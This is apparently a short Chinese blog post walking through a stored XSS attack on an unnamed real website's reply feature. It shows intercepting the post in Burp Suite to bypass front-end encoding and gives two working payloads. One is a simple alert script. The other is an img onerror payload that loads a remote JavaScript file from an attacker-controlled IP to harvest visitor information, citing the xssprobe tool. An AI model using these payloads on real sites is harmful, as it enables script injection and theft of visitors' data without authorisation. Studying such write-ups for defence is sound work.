某站发帖与回帖模块存在XSS,但由于它开启了httponly,XSS也就是测试下.
此例为回帖:
由于前端经过了HTML实体编码,内容随意填写一些好识别的:
![](https://img.haomeiwen.com/i2414995/bfd9087b27ffde17.png)
](https://img.haomeiwen.com/i2414995/2bd7996f8b3716b6.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
用Burp Suite 抓包修改内容部分
写入payload:<script>alert(1)</script>
![](https://img.haomeiwen.com/i2414995/e900528ffc448ce4.png)
修改后放行,关闭代理,页面出现弹窗:
![](https://img.haomeiwen.com/i2414995/9aa09b3842675105.png)
换一种玩法,加载js文件,获取更多信息:
重新回帖,Burp Suite 抓包修改内容部分
写入payload:<img src='x' onerror="s=createElement('script');body.appendChild(s);s.src='http://xxx.xxx.xxx.xxx/xsstest.js'">
![](https://img.haomeiwen.com/i2414995/c6da6ea14c900b9b.png)
修改后放行,关闭代理,在接收端可以看到获取到的信息:
![](https://img.haomeiwen.com/i2414995/c22fbc526e38d376.png)
获取信息的JS文件,PHP文件和HTML文件,都是借鉴github上的,支持下载:
https://github.com/evilcos/xssprobe
网友评论